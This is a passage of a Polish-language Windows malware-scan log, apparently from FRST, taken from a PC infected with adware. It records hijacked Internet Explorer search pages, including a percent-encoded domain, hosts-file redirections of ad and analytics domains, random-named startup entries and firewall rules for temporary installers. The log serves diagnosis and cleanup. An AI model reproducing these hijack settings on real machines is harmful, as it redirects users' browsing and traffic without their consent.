000150528 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Sensors.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000239616 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Svg.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 015911936 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5WebKit.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000196608 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5WebKitWidgets.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 004338176 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Widgets.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000154112 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5WinExtras.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000036352 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qdds.dll 2015-03-24 08:49 - 2015-03-24 08:49 - 000022016 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qgif.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000029184 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qicns.dll 2015-03-24 08:49 - 2015-03-24 08:49 - 000022528 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qico.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000383488 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qjp2.dll 2015-03-24 08:49 - 2015-03-24 08:49 - 000204288 ____R (Digia Plc and/or its 
subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qjpeg.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000215552 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qmng.dll 2015-03-24 08:51 - 2015-03-24 08:51 - 000016896 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qsvg.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000016384 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qtga.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000309248 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qtiff.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000015360 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qwbmp.dll 2015-03-24 10:20 - 2015-03-24 10:20 - 000256512 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\imageformats\qwebp.dll 2015-07-23 07:08 - 2015-07-23 07:08 - 000909824 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\qt_plugins\platforms\qwindows.dll 2014-05-06 11:30 - 2014-05-06 11:30 - 000964608 ____R (Free Software Foundation) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libiconv.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000683008 ____R (ImageMagick Studio LLC) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_wand_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000068608 ____R (Jean-loup Gailly and Mark Adler) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_zlib_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000051200 ____R (Julian Seward, jseward@acm.org) [Brak podpisu cyfrowego] 
C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_bzlib_.dll 2017-02-16 15:06 - 2017-02-16 15:06 - 000846336 _____ (Neil Hodgson neilh@scintilla.org) [Brak podpisu cyfrowego] C:\Program Files (x86)\notepad2\SciLexer.dll 2015-01-21 13:58 - 2014-10-16 17:54 - 000854680 _____ (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Brak podpisu cyfrowego] C:\Program Files\NVIDIA Corporation\NvStreamSrv\rxinput.dll 2015-01-21 13:58 - 2014-10-16 15:11 - 000067072 _____ (NVIDIA Corporation) [Brak podpisu cyfrowego] C:\Windows\SYSTEM32\Nv3DAppShExtR.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 002459648 ____R (Python Software Foundation) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\python27.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 002097664 ____R (The GLib developer community) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_glib_.dll 2014-05-06 07:24 - 2014-05-06 07:24 - 021529088 ____R (The ICU Project) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\icudt53.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001953280 ____R (The ICU Project) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\icuin53.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001316864 ____R (The ICU Project) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\icuuc53.dll 2020-12-29 17:01 - 2019-07-11 13:50 - 000145408 _____ (TODO: <公司名>) [Brak podpisu cyfrowego] C:\Windows\system32\wintab32.dll ==================== Alternate Data Streams (filtrowane) ======== (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [80850] AlternateDataStreams: C:\Windows\system32\drivers:x64 [360536] AlternateDataStreams: C:\Windows\system32\drivers:x86 [1156450] ==================== Tryb awaryjny (filtrowane) ================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NanoServiceMain => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PSUAService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NanoServiceMain => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PSUAService => ""="Service" ==================== Powiązania plików (filtrowane) ================= ==================== Internet Explorer (filtrowane) ========== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131523573115457195&GUID=2DA3CB6D-37F6-41D4-B344-003B8B5AF930 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131523573115462959&GUID=2DA3CB6D-37F6-41D4-B344-003B8B5AF930 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130928323672552439&GUID=2DA3CB6D-37F6-41D4-B344-003B8B5AF930 HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBSiA1rEAocN4PQUDpRKkKqLhA2_PfQjOXZcqKUK4Vb9oNbBvkDRT_e006JdWkp1_Tj1c3yCIJQ4l5waZiEEgiSDcf5a1j9hTl7oDSRIrUabytt7Vpvq1p3OI1JlagORhnLeJyE0PieZEpVUh0uUqabCfDS6c97U3vQRG6g_pda0u1qCKHtBW8,&q={searchTerms} HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=620947&OCID=AVRES007&pc=UE06 HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} SearchScopes: HKLM -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = 
hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBSiA1rEAocN4PQUDpRKkKqLhA2_PfQjOXZcqKUK4Vb9oNbBvkDRT_e006JdWkp1_Tj1c3yCIJQ4l5waZiEEgiSDcf5a1j9hTl7oDSRIrUabytt7Vpvq1p3OI1JlagORhnLeJyE0PieZEpVUh0uUqabCfDS6c97U3vQRG6g_pda0u1qCKHtBW8,&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\.DEFAULT -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\.DEFAULT -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-19 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-19 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-20 -> DefaultScope {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-20 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-21-2709180964-3026329352-173763364-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
hxxp://www.ourluckysites.com/search/?type=ds&ts=1492177483&z=18767f4722fc81bbe6ee472g2zatao0g9m8m5z1b2e&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} SearchScopes: HKU\S-1-5-21-2709180964-3026329352-173763364-1001 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://v9.com/web?type=ds&ts=1450260805&from=zzgbkk123&uid=st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt&z=393918ab985d185cac2ff93gezfw4ebofq7e0b0e5w&q={searchTerms} SearchScopes: HKU\S-1-5-21-2709180964-3026329352-173763364-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBSiA1rEAocN4PQUDpRKkKqLhA2_PfQjOXZcqKUK4Vb9oNbBvkDRT_e006JdWkp1_Tj1c3yCIJQ4l5waZiEEgiSDcf5a1j9hTl7oDSRIrUabytt7Vpvq1p3OI1JlagORhnLeJyE0PieZEpVUh0uUqabCfDS6c97U3vQRG6g_pda0u1qCKHtBW8,&q={searchTerms} BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-18] (Microsoft Corporation -> Microsoft Corporation) BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\aLhFOb7.dll => Brak pliku BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-18] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\FBxGJQO.dll => Brak pliku BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Brak nazwy -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> Brak pliku ==================== 
Hosts - zawartość: =========================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2013-08-22 14:25 - 2017-01-04 15:10 - 000003842 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 union.baidu2019.com
127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com
127.0.0.1 union.baidu2019.com
34.195.153.94 www.google-analytics.com
34.195.153.94 google-analytics.com
34.195.153.94 mc.yandex.ru
34.195.153.94 top-fwz1.mail.ru
34.195.153.94 site.yandex.net
34.195.153.94 pagead2.googlesyndication.com
34.195.153.94 ad.mail.ru
34.195.153.94 ads.adfox.ru
34.195.153.94 ads.pubmatic.com
34.195.153.94 apis.google.com
34.195.153.94 autocontext.begun.ru
34.195.153.94 b.scorecardresearch.com
34.195.153.94 c.amazon-adsystem.com
34.195.153.94 cdn.admixer.net
34.195.153.94 cdn.cxense.com
34.195.153.94 cdn.livefyre.com
34.195.153.94 cdn.onthe.io
34.195.153.94 cdn.optimizely.com
34.195.153.94 cdn.prom.st
34.195.153.94 cdn.pushwoosh.com

==================== Inne obszary ===========================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> %INTEL_DEV_REDIST%redist\intel64\compiler;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Calibre2\ HKU\S-1-5-21-2709180964-3026329352-173763364-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Byaku\Downloads\EP9DTodXkAAw44z.jpg DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Załączenie wejścia w fixlist spowoduje jego usunięcie.) HKLM\...\StartupApproved\StartupFolder: => "Adobe Gamma Loader.lnk" HKLM\...\StartupApproved\Run: => "WINCOM1AG" HKLM\...\StartupApproved\Run: => "WINCOM4EX" HKLM\...\StartupApproved\Run: => "WINCOM13V" HKLM\...\StartupApproved\Run: => "WINCOM28I" HKLM\...\StartupApproved\Run: => "WINCOM401" HKLM\...\StartupApproved\Run: => "WINCOMD0Q" HKLM\...\StartupApproved\Run: => "WINCOMDT2" HKLM\...\StartupApproved\Run32: => "ControlCenter3" HKLM\...\StartupApproved\Run32: => "Adobe ARM" HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "Yahoo! 
Search" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "AH27DYG16T" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "PR7D21D2K0" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "2J6NU8VHC9" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "4THO1IK97G" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "360wp-srv" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "F2SW9L1IOJ" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "OUIM9AU93L" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "PMM5FLRZ2E" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "R88HLBII65" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "IUYLLRM62N" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "I8GVKW93VJ" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "WF7NG36TRK" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "8YQI2IY2OK" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "20E6XMF978" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "5JB9R989OC" HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\StartupApproved\Run: => "W1TOWRVF70" ==================== Reguły Zapory systemu Windows (filtrowane) ================ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) 
FirewallRules: [{AA30F724-4917-43FF-AB08-BC06388D0D73}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{96283C7D-4431-45AF-9BCC-93B94EA042C1}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{4A2E13EA-6BEE-40EE-88C8-9BCD14DE2F45}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{A45C820D-645D-44D9-86B8-A5230EB36871}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{17D19508-15DF-4E18-885B-A6572882A9AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{252F9EE9-E9DA-42BF-88BF-9C767540FA34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [TCP Query User{EE82B542-3AD5-4904-8A1C-9712A0470373}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [UDP Query User{F93CBF06-E12C-4B7D-A26E-9342750927C0}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [{B5C9ED09-6F56-49AB-9403-9823C9A0F757}] => (Allow) C:\Program Files (x86)\Opera\opera.exe => Brak pliku FirewallRules: [{531FE1C0-8A78-4B71-BAE0-E0D76829A34F}] => (Allow) C:\Program Files (x86)\Opera\opera.exe => Brak pliku FirewallRules: [TCP Query User{44DD954A-0B4D-469A-9C47-981B66C968C9}C:\program files (x86)\opera\opera.exe] => (Block) C:\program files (x86)\opera\opera.exe => Brak pliku FirewallRules: [UDP Query User{10C1F563-45AB-423E-9C16-7FBB93880820}C:\program files (x86)\opera\opera.exe] => (Block) C:\program files (x86)\opera\opera.exe => Brak pliku 
FirewallRules: [{94B778E9-E65D-40BB-AF2D-CDA3BF84C3F5}] => (Allow) C:\Program Files (x86)\Crossbrowse\Crossbrowse\Application\crossbrowse.exe => Brak pliku FirewallRules: [TCP Query User{C01C9C43-9EE7-4F8B-BEE2-70491A498DC7}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [UDP Query User{91E89B34-D418-4B37-B6BD-323C088ED4EA}C:\program files (x86)\winamp\winamp.exe] => (Block) C:\program files (x86)\winamp\winamp.exe => Brak pliku FirewallRules: [{426B5AB9-2E3E-4B2F-BD77-F95A9D142D6C}] => (Allow) C:\Users\Byaku\AppData\Roaming\uTorrent\uTorrent.exe => Brak pliku FirewallRules: [{ED374271-D7DA-4BEB-8A0B-797E6EE0C58A}] => (Allow) C:\Users\Byaku\AppData\Roaming\uTorrent\uTorrent.exe => Brak pliku FirewallRules: [{EBA2869B-5A63-40B9-A6AF-B2999C8F599D}] => (Allow) C:\Users\Byaku\AppData\Local\Temp\is-69JNP.tmp\download\MiniThunderPlatform.exe => Brak pliku FirewallRules: [{2D1B475A-CE87-4B75-9116-3F40D8D6C2E2}] => (Allow) C:\Users\Byaku\AppData\Local\Temp\00003467\inst_buychannel_07.exe => Brak pliku FirewallRules: [{AAC1EC51-FBBA-4F98-8844-D1D9C5D8D125}] => (Allow) C:\Users\Byaku\AppData\Local\Temp\00003467\inst_buychannel_07.exe => Brak pliku FirewallRules: [{7AD758D5-95BF-4408-B869-CD92A2FFFC12}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\Down.exe => Brak pliku FirewallRules: [{F580E013-EDAB-4C92-B4B4-9D9513B96390}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\Down.exe => Brak pliku FirewallRules: [{193A8388-834C-4B1C-ADA8-5B0E0AF5BA85}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe => Brak pliku FirewallRules: [{ABF389A5-6C35-401E-A255-7B2F05686CBF}] => (Allow) C:\Program Files (x86)\LuDaShi\ComputerZTray.exe => Brak pliku FirewallRules: [{0942EEC5-BF7B-438E-A39E-1971DAB14FBA}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe => Brak pliku FirewallRules: [{1CA57F7D-3C69-4871-B17D-383C03B6E613}] => (Allow) C:\Program Files (x86)\LuDaShi\Utils\mininews.exe => 
Brak pliku FirewallRules: [{7CF713FE-DCBA-4FB0-8714-DA590DFBC795}] => (Allow) C:\Program Files (x86)\Maoha\MaohaAP\MaohaWifiSvr.exe => Brak pliku FirewallRules: [{6668F4C7-C04D-4DAC-8C28-E69E0112B4F7}] => (Allow) C:\Users\Byaku\AppData\Roaming\360bizhi\Update\Link.exe (Qihoo 360 Software (Beijing) Company Limited -> ) FirewallRules: [{6E5B88CF-37E8-4A37-9A4D-D72D03B69223}] => (Allow) C:\Users\Byaku\AppData\Roaming\360bizhi\Update\Link.exe (Qihoo 360 Software (Beijing) Company Limited -> ) FirewallRules: [{A773A73F-96A0-400B-9872-37C9901190A9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe => Brak pliku FirewallRules: [{07667BE9-42A3-4D73-80A5-3B5DB74473C6}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc -> Google Inc.) FirewallRules: [{187BA52A-4CE6-4D0F-A1C8-0AC32C8003BA}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt.dat => Brak pliku FirewallRules: [{221755B6-1D97-4541-B640-4D53D95B244A}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w3813vktxxxxw3813vkt.dat => Brak pliku FirewallRules: [{FFEAC1E6-F11E-4CA3-A4A4-512D09A5EF1D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Punkty Przywracania systemu ========================= ==================== Wadliwe urządzenia w Menedżerze urządzeń ============ ==================== Błędy w Dzienniku zdarzeń: ======================== Dziennik Aplikacja: ================== Error: (12/13/2020 09:16:31 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe". Nie można odnaleźć zestawu zależnego 87.0.4280.88,language="*",type="win32",version="87.0.4280.88". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. 
Error: (10/29/2020 08:44:41 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe". Nie można odnaleźć zestawu zależnego 86.0.4240.111,language="*",type="win32",version="86.0.4240.111". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (10/29/2020 08:44:41 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe". Nie można odnaleźć zestawu zależnego 86.0.4240.111,language="*",type="win32",version="86.0.4240.111". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (10/10/2020 01:36:15 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: AGSService.exe, wersja: 7.2.0.32, sygnatura czasowa: 0x5f6abe78 Nazwa modułu powodującego błąd: AGSService.exe, wersja: 7.2.0.32, sygnatura czasowa: 0x5f6abe78 Kod wyjątku: 